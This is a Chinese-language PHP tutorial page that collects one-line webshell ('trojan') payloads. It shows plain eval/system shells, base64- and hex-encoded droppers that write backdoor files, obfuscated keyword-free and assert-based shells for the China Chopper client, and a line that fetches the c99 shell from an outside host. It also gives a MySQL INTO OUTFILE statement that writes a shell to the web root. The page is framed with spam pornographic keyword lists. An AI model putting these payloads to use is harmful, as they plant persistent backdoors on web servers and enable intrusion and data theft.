激情久久久_欧美视频区_成人av免费_不卡视频一二三区_欧美精品在欧美一区二区少妇_欧美一区二区三区的

服務器之家:專注于服務器技術及軟件下載分享
分類導航

PHP教程|ASP.NET教程|Java教程|ASP教程|編程技術|正則表達式|C/C++|IOS|C#|Swift|Android|VB|R語言|JavaScript|易語言|vb.net|

服務器之家 - 編程語言 - PHP教程 - PHP與SQL語句寫一句話木馬總結

PHP與SQL語句寫一句話木馬總結

2021-08-31 15:43藏色散人 PHP教程

在本篇文章里小編給大家整理的是關于PHP與SQL語句寫一句話木馬的相關知識點,有需要的朋友們學習下。

一、基礎類的一句話--功能僅限于驗證漏洞了,實際中非常容易被查出出來:

?
1
2
3
<?php @eval($_GET["code"])?>
 
<?php @system($_POST["cmd"])?>

二、編碼的替換的類型:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
<?php @fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));?>
 
//會生成<?php @eval($_POST['lostwolf']);?>
 
 
 
<script language="php">@fputs(fopen(base64_decode('bG9zdC5waHA='),w),base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg=='));</script>
 
//php在html內部的一種嵌入方式
 
 
 
<?php fputs (fopen(pack("H*","6c6f7374776f6c662e706870"),"w"),pack("H*","3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e"))?>
 
 
 
 
 
<?php
 
session_start();
 
$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);
 
$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');?>

三、其他類型:

?
1
2
3
4
5
6
7
8
9
<?php $_GET[a]($_GET[b]);?>
 
//?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};
 
<?php assert($_REQUEST["pass"]);?>   //菜刀連接 躲避檢測 密碼pass
 
<?php substr(md5($_REQUEST['x']),28)=='acd0'&&eval($_REQUEST['pass']);?>
 
//菜刀提交 http://192.168.1.5/x.php?x=lostwolf 腳本類型:php 密碼為 pass

四、下載類型:

?
1
2
3
4
5
<?php echo copy("http://www.r57.me/c99.txt","lostwolf.php"); ?>
 
<? echo file_get_contents("..//cfg_database.php");?> //顯示某文件
 
<? eval ( file_get_contents("遠程shell")) ?> //運行遠程shell

五、無關鍵函數類型:

?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
 
$_="";
 
$_[+""]='';
 
$_="$_"."";
 
$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");
 
?>
 
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>
 
http://site/2.php?_=assert&__=eval($_POST['pass']) 密碼是pass
 
<?$_="";$_[+""]='_';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>

六、補充知識點:

SQL寫一句話(MySQL):

?
1
2
3
select "<?php @system($_POST["pass"]);?>" into outfile "/home/webaccount/projectname/www/*.php"
 
#前面是一句話內容 后面是絕對路徑www下的PHP文件,同理其他腳本也可以

以上就是PHP一句話木馬小結與SQL語句寫一句話木馬的詳細內容,感謝大家的學習和對服務器之家的支持。

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 九九热这里只有精品8 | 91看片www | 精品国产一区二区三区久久久蜜 | 成人h精品动漫一区二区三区 | 久色一区| 亚洲一区二区三区在线看 | 日韩视频高清 | 911网站大全在线观看 | 国产久草视频在线 | 92自拍视频 | 久久精品人人做人人爽 | 久久成人免费观看 | 嫩呦国产一区二区三区av | 精品国产91久久久久久浪潮蜜月 | 成人精品视频在线 | 国产精品午夜在线观看 | 精品一区二区三区中文字幕老牛 | 精品国产视频一区二区三区 | 在线成人免费视频 | 精品成人国产在线观看男人呻吟 | 免费观看一区 | av在线免费看片 | 日本欧美一区二区三区在线观看 | 亚洲成人黄色片 | 一级做a爱片性色毛片 | 色中色综合网 | 亚洲成人午夜精品 | 九一传媒在线观看 | 中文字幕国 | 亚洲3atv精品一区二区三区 | 美女毛片儿 | 国产一有一级毛片视频 | 精品免费久久 | 亚洲一区二区中文字幕在线观看 | av在线免费看片 | 欧美精品在线视频观看 | 欧美性受xxx黑人xyx性爽 | av在线观 | 午夜视频啊啊啊 | 久久久久久久久久亚洲 | 91网址在线观看 |